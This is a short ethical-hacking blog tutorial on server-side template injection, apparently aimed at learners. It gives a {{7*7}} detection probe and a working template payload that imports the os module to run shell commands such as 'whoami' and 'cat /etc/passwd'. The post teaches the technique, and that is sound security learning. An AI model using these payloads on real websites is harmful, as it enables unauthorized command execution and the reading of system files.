Ethical Hacking

Server-Side Template Injection(SSTI) to Remote Code Execution (RCE)

Server-Side Template Injection(SSTI) to Remote Code Execution (RCE)

Hello Hackers,

Let’s read some Cybersecurity Blogs…

Today we will learn about a vulnerability, which is very easy to exploit named Server Side Template Injection(SSTI), but it creates a critical impact on the target user and leads to command injection in the victim’s website.

so let’s start, the first thing we need to find over the website is Injecting points like a search bar, username, name, etc. which also reflects the value which is injected.




I found one injecting point which also returns my value back after Hi, <value>

You might think about, what will be its backend code and how it’s reflecting the value, so I am having its code.

The above code shows that the web application is vulnerable to SSTI vulnerability and we can start exploiting this.

For exploiting SSTI there are many payloads, but a simple payload that verifies if the web application is vulnerable or not is {{<any operation>}} like {{7*7}}, once this payload is executed it will display the multiplication of 7 and 7, you can use any number or any operation like +, -, *, /, <, %.

Escalating SSTI to RCE

Once you find the web application is vulnerable to SSTI, it’s simple to escalate it to RCE(Remote Code Execution) you just need to check all the payloads which are going to work, you may follow GitHub Repos and another website.

{{request.application.__globals__.__builtins__.__import__('os').popen('whoami').read()}}

I have used the above payload to get RCE on the website.




Now my final task is to view the “/etc/passwd file, so I replaced id with cat /etc/passwd.

SSTI can be found in Email templates(set username as SSTI payload), Comment fields, and many more places.

SO that’s all for today and it’s time to say Bye !!!

Happy Hacking !!

If you Feel this blog added something to your building skills, then share this blog with others too…

Share this post

About the author

Leave a Reply

Your email address will not be published. Required fields are marked *